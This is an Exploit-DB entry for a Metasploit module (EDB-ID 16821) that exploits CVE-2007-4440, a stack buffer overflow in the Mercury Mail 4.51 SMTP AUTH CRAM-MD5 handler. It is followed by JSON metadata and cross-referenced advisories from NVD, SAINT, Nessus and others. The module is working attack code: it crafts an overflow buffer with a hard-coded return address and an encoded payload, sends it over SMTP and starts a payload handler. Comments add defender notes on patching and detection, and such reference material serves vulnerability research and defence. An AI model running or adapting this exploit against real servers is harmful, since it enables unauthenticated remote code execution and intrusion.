ID EDB-ID:16821 Type exploitdb Reporter metasploit Modified 2010-06-22T00:00:00
Description
Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow. CVE-2007-4440. Remote exploit for the Windows platform.
##
# $Id: mercury_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit exploit module for CVE-2007-4440: a stack buffer overflow in the
# MercuryS SMTP server of Mercury Mail Transport System 4.51, triggered by an
# oversized argument to the AUTH CRAM-MD5 command.
#
# Defender notes:
# - Fix: upgrade Mercury Mail Transport System to 4.52 or later (the vendor
#   release that addresses this issue, per the advisories reproduced on this page).
# - Detection: the session below is EHLO -> AUTH CRAM-MD5 -> one base64 line of
#   1283 raw bytes (roughly 1.7 KB encoded). A legitimate CRAM-MD5 response is a
#   short base64 token ("username hexdigest"), so an AUTH continuation line of
#   this size from an unauthenticated client is a reliable IDS/mail-log indicator.
# - Exposure: unauthenticated, network-reachable (CVSS 7.5 on this page); the
#   impact is bounded by the privileges the Mercury service runs under.
class Metasploit3 < Msf::Exploit::Remote
# Metasploit reliability ranking for this module.
Rank = GreatRanking
# Provides connect/disconnect/sock and the RHOST/RPORT options used in #exploit.
include Msf::Exploit::Remote::Tcp
# Registers the module metadata (name, references, payload constraints, target)
# with the framework. `info` is the caller-supplied info hash merged by update_info.
def initialize(info = {})
super(update_info(info,
'Name' => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.
By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker
may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'Version' => '$Revision: 9583 $',
# Public identifiers for this vulnerability; useful for correlating scanner
# findings (Nessus, SAINT, OSVDB entries are listed on this page).
'References' =>
[
[ 'CVE', '2007-4440' ],
[ 'OSVDB', '39669' ],
[ 'BID', '25357' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
# Metasploit flag: the payload is expected to run with the (elevated) privileges
# of the Mercury service process; the actual level depends on how the service
# was installed.
'Privileged' => true,
'Payload' =>
{
# Maximum encoded payload size; #exploit pads the payload region out to 1075 bytes.
'Space' => 600,
# Bytes the payload encoder must avoid: NUL, LF, CR, space and '%'.
'BadChars' => "\x00\x0a\x0d\x20\x25",
'StackAdjustment' => -3500,
},
# Single hard-coded target; 'Ret' is a module-specific address taken from ter32.dll,
# so this module is only expected to work against exactly this build.
'Targets' =>
[
[ 'Mercury Mail Transport System 4.51', { 'Ret' => 0x258d0d1e } ], # ter32.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 18 2007'))
# SMTP default port; overridable via RPORT.
register_options([ Opt::RPORT(25) ], self.class)
end
# Runs the exploit: walks a minimal SMTP dialogue up to the CRAM-MD5 challenge,
# then sends a single oversized base64 "response" line and starts the payload handler.
# No return value; errors from the socket layer propagate to the framework.
def exploit
connect
# Read the server banner (response content is not checked).
sock.get_once
sock.put("EHLO\r\n")
sock.get_once
# Request the CRAM-MD5 mechanism; the server answers with a base64 challenge.
sock.put("AUTH CRAM-MD5\r\n")
sock.get_once
# select() with no fd sets is used here as a 250 ms sleep.
select(nil,nil,nil,0.25)
# Raw buffer layout: 204 bytes of filler, then the 32-bit little-endian target
# address ('V'), then the encoded payload padded with filler to 1075 bytes.
# Total raw length is 1283 bytes regardless of payload size.
buffer = rand_text_alpha_upper(204) + [target.ret].pack('V')
buffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)
# CRAM-MD5 responses are base64, so the whole buffer is sent as one encoded line.
sploit = Rex::Text.encode_base64(buffer)
print_status("Trying target #{target.name}...")
sock.put(sploit + "\r\n")
# Start the payload handler, then close the SMTP connection.
handler
disconnect
end
end
{"hash": "56655b4c9a4736d469c8856ed752f6123843d68af03f898cb6b65547bceea29c", "id": "EDB-ID:16821", "lastseen": "2016-02-02T06:35:13", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/16821/", "description": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow. CVE-2007-4440. Remote exploit for windows platform", "title": "Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow", "sourceData": "##\r\n# $Id: mercury_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\r\n\t\t\t\tBy sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\r\n\t\t\t\tmay be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9583 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-4440' ],\r\n\t\t\t\t\t[ 'OSVDB', '39669' ],\r\n\t\t\t\t\t[ 'BID', '25357' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' 
=> \"\\x00\\x0a\\x0d\\x20\\x25\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Mercury Mail Transport System 4.51',\t{ 'Ret' => 0x258d0d1e } ], # ter32.dll\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 18 2007'))\r\n\r\n\t\tregister_options([ Opt::RPORT(25) ], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsock.get_once\r\n\r\n\t\tsock.put(\"EHLO\\r\\n\")\r\n\r\n\t\tsock.get_once\r\n\r\n\t\tsock.put(\"AUTH CRAM-MD5\\r\\n\")\r\n\r\n\t\tsock.get_once\r\n\t\tselect(nil,nil,nil,0.25)\r\n\r\n\t\tbuffer = rand_text_alpha_upper(204) + [target.ret].pack('V')\r\n\t\tbuffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)\r\n\r\n\t\tsploit = Rex::Text.encode_base64(buffer)\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\tsock.put(sploit + \"\\r\\n\")\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-4440"], "published": "2010-06-22T00:00:00", "osvdbidlist": ["39669"], "references": [], "reporter": "metasploit", "modified": "2010-06-22T00:00:00", "href": "https://www.exploit-db.com/exploits/16821/"}
{"result": {"cve": [{"id": "CVE-2007-4440", "type": "cve", "title": "CVE-2007-4440", "description": "Stack-based buffer overflow in the MercuryS SMTP server in Mercury Mail Transport System, possibly 4.51 and earlier, allows remote attackers to execute arbitrary code via a long AUTH CRAM-MD5 string. NOTE: this might overlap CVE-2006-5961.", "published": "2007-08-20T20:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4440", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-09-29T14:25:29"}], "saint": [{"id": "SAINT:22E7286F9783F05DBFC7B5B9CDBD5350", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. 
\n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-12-14T16:58:06"}, {"id": "SAINT:491FF49E4743FD3140AD54B41D5EBB5F", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. 
\n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-10-03T15:01:59"}, {"id": "SAINT:132528EF0A0ABE0820C9BC93319E35C0", "type": "saint", "title": "Mercury Mail SMTP AUTH CRAM-MD5 buffer overflow", "description": "Added: 10/05/2007 \nCVE: [CVE-2007-4440](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440>) \nBID: [25357](<http://www.securityfocus.com/bid/25357>) \nOSVDB: [39669](<http://www.osvdb.org/39669>) \n\n\n### Background\n\n[Mercury Mail Transport System](<http://www.pmail.com/overviews/ovw_mercury.htm>) is an e-mail server product for Windows and NetWare. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP service allows remote attackers to execute arbitrary commands by sending a specially crafted argument to the `**AUTH CRAM-MD5**` command. \n\n### Resolution\n\n[Upgrade](<http://www.pmail.com/downloads.htm>) to Mercury Mail Transport System version 4.52 or higher. \n\n### References\n\n<http://secunia.com/advisories/26519> \n<http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html> \n\n\n### Limitations\n\nExploit works on Mercury Mail Transport System 4.51. 
\n\n### Platforms\n\nWindows \n \n\n", "published": "2007-10-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mercury_smtp_crammd5", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-01-10T14:03:43"}], "osvdb": [{"id": "OSVDB:39669", "type": "osvdb", "title": "Mercury Mail Transport System SMTP AUTH CRAM-MD5 Remote Overflow", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.pmail.com/m32_451.htm\nSecurity Tracker: 1018587\n[Secunia Advisory ID:26519](https://secuniaresearch.flexerasoftware.com/advisories/26519/)\nOther Advisory URL: http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065357.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html\nISS X-Force ID: 36117\nISS X-Force ID: 36299\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4294\nFrSIRT Advisory: ADV-2007-2918\n[CVE-2007-4440](https://vulners.com/cve/CVE-2007-4440)\nBugtraq ID: 25357\n", "published": "2007-08-18T15:21:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:39669", "cvelist": ["CVE-2007-4440"], "lastseen": "2017-04-28T13:20:35"}], "exploitdb": [{"id": "EDB-ID:4294", "type": "exploitdb", "title": "Mercury SMTPD Remote Preauth Stack Based Overrun PoC", "description": "Mercury SMTPD Remote Preauth Stack Based Overrun PoC. CVE-2007-4440. 
Dos exploit for windows platform", "published": "2007-08-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4294/", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-01-31T20:34:57"}], "packetstorm": [{"id": "PACKETSTORM:82990", "type": "packetstorm", "title": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82990/Mercury-Mail-SMTP-AUTH-CRAM-MD5-Buffer-Overflow.html", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-12-05T22:15:53"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/SMTP/MERCURY_CRAM_MD5", "type": "metasploit", "title": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", "description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code.", "published": "2007-11-07T18:42:19", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2007-4440"], "lastseen": "2018-02-24T18:58:20"}], "nessus": [{"id": "MERCURY_SMTP_AUTH_CRAM_MD5_OVERFLOW.NASL", "type": "nessus", "title": "Mercury SMTP Server AUTH CRAM-MD5 Remote Buffer Overflow", "description": "The remote host is running the Mercury Mail Transport System, a free suite of server products for Windows and NetWare associated with Pegasus Mail. \n\nThe version of Mercury Mail installed on the remote host includes an SMTP server that is affected by a buffer overflow flaw. 
Using a specially crafted 'AUTH CRAM-MD5' request, an unauthenticated, remote attacker can leverage this issue to crash the remote application and even execute arbitrary code remotely, subject to the privileges under which the application runs.", "published": "2007-08-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=25928", "cvelist": ["CVE-2007-4440"], "lastseen": "2016-09-26T17:24:01"}]}}